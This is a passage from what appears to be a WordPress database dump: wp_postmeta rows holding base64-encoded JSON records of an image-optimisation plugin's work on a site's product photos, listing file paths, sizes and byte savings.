NvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDcyLCJ0aW1lIjoxNDgzNTY2NzQzLCJpZCI6MTY5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUyNiwidGltZSI6MTQ4MzU2Njc0NiwiaWQiOjE2OTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDUwLCJ0aW1lIjoxNDgzNTY2NzUwLCJpZCI6MTY5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTA3LCJ0aW1lIjoxNDgzNTY2NzUzLCJpZCI6MTY5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjY1LCJ0aW1lIjoxNDgzNTY2NzU3LCJpZCI6MTY5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzcwLCJ0aW1lIjoxNDgzNTY2NzYwLCJpZCI6MTY5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci00NTB4MjkzLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci00NTB4MjkzLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMjkzIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci00NTB4MjkzLmpwZyIsInJlZHVjdGlvbiI6OTUxLCJ0aW1lIjoxNDgzNTY2NzY0LCJpZCI6MTY5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQ2MiwidGltZSI6MTQ4MzU2Njc2NywiaWQiOjE2OTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29318, 1691, 'wpfc_optimisation_reduction', '10948'); 
INSERT INTO `wp_postmeta` VALUES (29319, 1691, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci5qcGciLCJ3aWR0aCI6Mzg4OCwiaGVpZ2h0IjoyNTkyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY2NzcyLCJpZCI6IjE2OTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTg1LCJ0aW1lIjoxNDgzNTY2Nzc1LCJpZCI6MTY5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEwNTAsInRpbWUiOjE0ODM1NjY3NzksImlkIjoxNjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTc4LCJ0aW1lIjoxNDgzNTY2Nzg0LCJpZCI6MTY5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjEzMCwidGltZSI6MTQ4MzU2Njc4OSwiaWQiOjE2OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjAsInRpbWUiOjE0ODM1NjY3OTMsImlkIjoxNjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY2LCJ0aW1lIjoxNDgzNTY2Nzk2LCJpZCI6MTY5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5OSwidGltZSI6MTQ4MzU2Njc5OSwiaWQiOjE2OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NzUsInRpbWUiOjE0ODM1NjY4MDMsImlkIjoxNjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1NjY4MDcsImlkIjoxNjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo4MzEsInRpbWUiOjE0ODM1NjY4MTAsImlkIjoxNjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4NzUsInRpbWUiOjE0ODM1NjY4MTQsImlkIjoxNjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1mbHV4LXJlbW92ZXItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMjUxLCJ0aW1lIjoxNDgzNTY2ODE4LCJpZCI6MTY5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtZmx1eC1yZW1vdmVyLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLWZsdXgtcmVtb3Zlci05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQ1MSwidGltZSI6MTQ4MzU2NjgyMSwiaWQiOjE2OTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29320, 1684, 'wpfc_optimisation_reduction', '11502'); 
INSERT INTO `wp_postmeta` VALUES (29321, 1684, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LmpwZyIsIndpZHRoIjo0Mjg4LCJoZWlnaHQiOjI4NDgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjY4MjYsImlkIjoiMTY4NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1MzgsInRpbWUiOjE0ODM1NjY4MjksImlkIjoxNjg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC04MDB4NTMxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC04MDB4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC04MDB4NTMxLmpwZyIsInJlZHVjdGlvbiI6OTM5LCJ0aW1lIjoxNDgzNTY2ODMzLCJpZCI6MTY4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtNzY4eDUxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtdnlkYXgtZHJ5ZmlsbS1sdWJyaWNhbnQtNzY4eDUxMC5qcGciLCJyZWR1Y3Rpb24iOjkyNCwidGltZSI6MTQ4MzU2NjgzNywiaWQiOjE2ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTE2MDB4MTA2My5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDYzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC12eWRheC1kcnlmaWxtLWx1YnJpY2FudC0xNjAweDEwNjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXZ5ZGF4LWRyeWZpbG0tbHVicmljYW50LTE2MDB4MTA2My5qcGciLCJyZWR1Y3Rpb24iO